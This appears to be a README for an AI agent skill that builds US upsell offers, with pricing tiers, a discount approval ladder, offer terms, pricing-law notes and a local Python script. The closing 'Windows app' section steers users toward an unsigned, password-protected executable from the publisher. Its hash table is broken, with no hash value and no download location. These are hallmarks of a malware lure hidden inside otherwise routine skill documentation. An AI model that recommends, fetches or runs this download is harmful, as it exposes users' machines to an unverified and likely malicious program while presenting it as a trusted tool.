Upsell Offer Designer
Designs a US upsell or expansion offer with tiered pricing, an approval-safe discount ladder and the terms a buyer will read. Written for US account managers and customer success teams selling expansion into installed accounts.
Use this skill when someone asks for:
- upsell offer design
- expansion pricing tiers
- upgrade offer template
- b2b upsell pricing
The job
Account managers invent a discount on the spot, so the same customer gets different terms and the margin quietly disappears.
What you get
- Collect the current plan, the usage driver, the contract end date and the approval rules.
- Build the tiers from the cost base so each tier carries a real margin.
- Set the discount ladder and mark the levels that need approval above a dollar amount.
- Write the offer terms: what starts when, what the renewal price becomes and what the buyer must do.
Output contract:
- tiers - three tiers with the price, the margin and what changes at each level
- discount_ladder - the discount allowed at each level and who approves it
- offer_terms - start date, renewal price, minimum term and the buyer's action
- approval_flags - the terms that need a manager or finance sign-off
US specifics that matter
- The Robinson-Patman Act at 15 USC 13(a) requires a discount offered to one customer to be available to other customers buying in similar quantities under substantially similar conditions.
- A discount defended by good-faith cost justification or a meeting of competition is a recognized defense under the Robinson-Patman rules.
- FTC price advertising rules at 16 CFR Part 233 treat a price as an advertising claim that must be a bona fide offer.
- 16 CFR 242.3 requires an advertised price to be available for at least 14 consecutive days, which is why an offer needs a stated end date.
Guardrails (hard rules)
- Never offer a discount above the approved ladder or a term that finance has not signed off.
- Never use a competitor's pricing in the offer without a documented like-for-like comparison.
- Never promise a renewal discount that has not been approved in writing.
- Never present the offer as a legal or tax opinion.
Quickstart
1. Fill in the brief
templates/upsell-offer.yaml is the starting point. Copy it, fill in your own numbers, and
keep the field names - the script reads them by name.
2. Run the script
python3 scripts/build_offer_tiers.py --input upsell-offer.yaml --out ./out
The script is standalone: Python 3 standard library only, no install step, no network calls, no API keys.
3. Check the result against the reference
references/upsell-offer-rules.md holds the limits, the US rules and the checklist the output has
to satisfy. Read it before you send anything to a customer or a platform.
Discount discipline
- Write the ladder with the maximum discount and the person who approves it.
- Keep the buyer-population check in mind: similar quantities and similar conditions.
- Record the justification for every exception, cost-based or competitive.
- Re-approve the ladder when the cost base changes, not just when the quarter does.
Offer terms a buyer can read
- What the new price is, what it replaces and when it starts.
- What the renewal price becomes and the minimum term.
- What the buyer has to do and the date the offer ends.
- Whether the offer applies to the whole account or named seats only.
Claims to avoid
- No savings claim without the baseline price and the period it was measured over.
- No free year or free trial without the material terms disclosed.
- No cost-per-seat comparison across different seat counts without saying so.
- No savings claim on a price that has not been available for the advertised period.
The Windows app (optional)
The workflow above runs anywhere Python 3 runs. If you also want the publisher's Windows multi-tool app for the workflows in this catalog, it is a separate download. This bundle does not contain it, does not install it, and never runs it - you decide whether to fetch it.

| Inside the archive | multitool/toolkit.exe |
Check the download before you run it. PowerShell:
Get-FileHash .\multitool.zip -Algorithm SHA256
The hash must match the value in the table. Then extract the archive and start
multitool/toolkit.exe.
The program is not code-signed, so Windows SmartScreen shows Unknown publisher. Run it only if you accept an unsigned program, keep it in a folder of its own, and do not run it as administrator unless you have a reason to.
The installer asks for a password; ask the publisher for it before you start.
